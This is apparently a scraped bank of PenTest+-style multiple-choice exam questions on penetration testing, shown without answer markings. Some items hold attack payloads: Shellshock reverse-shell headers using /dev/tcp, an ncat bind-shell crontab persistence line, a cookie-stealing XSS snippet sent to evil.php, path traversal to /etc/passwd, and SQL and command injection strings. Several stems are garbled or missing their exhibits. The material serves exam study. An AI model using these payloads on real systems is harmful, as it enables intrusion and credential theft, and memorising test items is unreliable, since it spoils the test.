Which of the following are the BEST methods to prevent against this type of attack? (Choose two.) Web-application firewall Parameterized queries Output encoding Session tokens Input validation Base64 encoding.
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT? Reach out to the primary point of contact Try to take down the attackers Call law enforcement officials immediately Collect the proper evidence and add to the final report.
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings? Manually check the version number of the VoIP service against the CVE release Test with proof-of-concept code from an exploit database Review SIP traffic from an on-path position to look for indicators of compromise Utilize an nmap sV scan against the service.
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? nmap 192.168.1.1-5 PU22-25,80 nmap 192.168.1.1-5 PA22-25,80 nmap 192.168.1.1-5 PS22-25,80 nmap 192.168.1.1-5 Ss22-25,80.
A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries? Immunity Debugger OllyDbg GDB Drozer.
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal? VRFY and EXPN VRFY and TURN EXPN and TURN RCPT TO and VRFY.
Which of the following tools provides Python classes for interacting with network protocols? Responder Impacket Empire PowerSploit.
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective? Alternate data streams PowerShell modules MP4 steganography PsExec.
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future? Enforce mandatory employee vacations Implement multifactor authentication Install video surveillance equipment in the office Encrypt passwords for bank account information.
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection? nmap p0 T0 sS 192.168.1.10 nmap sA sV --host-timeout 60 192.168.1.10 nmap f --badsum 192.168.1.10 nmap A n 192.168.1.10.
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? Analyze the malware to see what it does Collect the proper evidence and then remove the malware Do a root-cause analysis to find out how the malware got in. Remove the malware immediately. Stop the assessment and inform the emergency contact.
A penetration tester runs the following command on a system:
find /-user root perm -4000 print 2>/dev/null
Which of the following is the tester trying to accomplish?
Set the SGID on all files in the /directory Find the /root directory on the system Find files with the SUID bit set Find files that were created during exploitation and move them to /dev/null.
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Hydra and crunch Netcat and cURL Burp Suite and DIRB Nmap and OWASP ZAP.
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience? Executive summary of the penetration-testing methods used Bill of materials including supplies, subcontracts, and costs incurred during assessment Quantitative impact assessments given a successful software compromise Code context for instances of unsafe type-casting operations.
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection Send a "hello" payload Walt for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
Run nmap Pn sV script vuln <IP address>. Employ an OpenVAS simple scan against the TCP port of the host. Create a script in the Lua language and use it with NSE. Perform a credentialed scan with Nessus.
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement? Direct-to-origin Cross-site scripting Malware injection Credential harvesting.
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system? Weekly Monthly Quarterly Annually.
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? Halt the penetration test. Conduct an incident response Deconflict with the penetration tester Assume the alert is from the penetration test.
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? Run nmap with the -O, -p22, and -sC options set against the target Run nmap with the sV and p22 options set against the target Run nmap with the --script vulners option set against the target Run nmap with the sA option set against the target.
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? iam_enum_permissions iam_privesc_scan iam_backdoor_assume_role iam_bruteforce_permissions.
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? Add a dependency checker into the tool chain Perform routine static and dynamic analysis of committed code Validate API security settings before deployment Perform fuzz testing of compiled binaries.
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? Cross-site request forgery Server-side request forgery Remote file inclusion Local file inclusion.
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? Clarify the statement of work Obtain an asset inventory from the client Interview all stakeholders Identify all third parties involved.
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take? Perform forensic analysis to isolate the means of compromise and determine attribution. Incorporate the newly identified method of compromise into the red team's approach Create a detailed document of findings before continuing with the assessment Halt the assessment and follow the reporting procedures as outlined in the contract.
Which of the following objectives is the tester attempting to achieve? Determine active hosts on the network. Set the TTL of ping packets for stealth. Fill the ARP table of the networked devices Scan the system on the most used ports.
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? Whether the cloud service provider allows the penetration tester to test the environment Whether the specific cloud services are being used by the application The geographical location where the cloud services are running Whether the country where the cloud service is based has any impeding laws.
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit? Perform XSS. Conduct a watering-hole attack Use BeEF Use browser autopwn.
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.) IP addresses and subdomains Zone transfers DNS forward and reverse lookups Internet search engines Externally facing open ports Shodan results.
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? Forensically acquire the backdoor Trojan and perform attribution Utilize the backdoor in support of the engagement Continue the engagement and include the backdoor finding in the final report Inform the customer immediately about the backdoor.
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.) The CVSS score of the finding The network location of the vulnerable device The vulnerability identifier The client acceptance form The name of the person who found the flaw The tool used to find the issue.
A penetration tester performs the following command:
curl I http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive ? HTTP/2 200
...
x-frame-options:SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin
strict-transport-security: max-age=31536000; includeSubdomains; preload <!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"
</head>
<body lang="en">
</body>
</html>
Total% Received% Xferd% Avarage Speed Time Time Time Current
100 1698k 100 1698k 00 1566k 0 Dload Upload 00:01 00:01 - 1565k ####################################################################.
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? John the Ripper Hydra MimiKatz Cain and Abel.
A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network.
Which of the following accounts should the tester use to return the MOST results? Root user Local administrator Service Network administrator.
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>.
Which of the following would be the best action for the tester to take NEXT with this information? Create a custom password dictionary as preparation for password spray testing. Recommend using a password manage/vault instead of text files to store passwords securely Recommend configuring password complexity rules in all the systems and applications. Document the unprotected file repository as a finding in the penetration-testing report.
Which of the following is the MOST effective person to validate results from a penetration test? Third party Team Leader Chief Information Officer Client.
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling
Vulnerability analysis Exploitation and post exploitation Reporting
Which of the following methodologies does the client use? OWASP Web Security Testing Guide PTES technical guidelines NIST SP 800-115 OSSTMM.
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? A firewall or IPS blocked the scan. The penetration tester used unsupported flags The edge network device was disconnected The scan returned ICMP echo replies.
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines.
Which of the following documents could hold the penetration tester accountable for this action? ROE SLA MSA NDA.
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan? nmap vv sUV p 53, 123-159 10.10.1.20/24 oA udpscan nmap vv sUV p 53,123,161-162 10.10.1.20/24 oA udpscan nmap vv sUV p 53,137-139,161-162 10.10.1.20/24 oA udpscan nmap vv sUV p 53, 122-123, 160-161 10.10.1.20/24 oA udpscan.
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? Smurf Ping Flood Fraggle Ping of Death.
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff? A quick description of the vulnerability and a high-level control to fix it Information regarding the business impact if compromised The executive summary and information regarding the testing company The rules of engagement from the assessment.
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run? exploits = {"User-Agent": "() { ignored;};/bin/bash i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} exploits = {"User-Agent": "() { ignored;};/bin/bash i>& find /-perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} exploits = {"User-Agent": "() { ignored;};/bin/sh i ps ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} exploits = {"User-Agent": "() { ignored;};/bin/bash i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}.
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations? NIST SP 800-53 OWASP Top 10 MITRE ATT&CK framework PTES technical guidelines.
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in? HTTPS communication Public and private keys Password encryption Sessions and cookies.
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? OpenVas Nikto SQLmap Nessus.
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.
Which of the following can be used to ensure the tester is able to maintain access to the system? schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe wmic startup get caption,command crontab l; echo "@reboot sleep 200 && ncat lvp 4242 e /bin/bash") | crontab 2>/dev/null sudo useradd ou 0 g 0 user.
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements? "cisco-ios" "admin+1234" "cisco-ios" "no-password" "cisco-ios" "default-passwords" "cisco-ios" "last-modified".
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website? <script>var adr= `../evil.php?test=' + escape(document.cookie);</script> ../../../../../../../../../../etc/passwd /var/www/html/index.php;whoami 1 UNION SELECT 1, DATABASE(),3--.
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following
Which of the following would be a recommendation for remediation? Deploy a user training program Implement a patch management plan Utilize the secure software development life cycle Configure access controls on each of the servers.
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request? The reverse-engineering team may have a history of selling exploits to third parties. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry. The reverse-engineering team will be given access to source code for analysis.
|
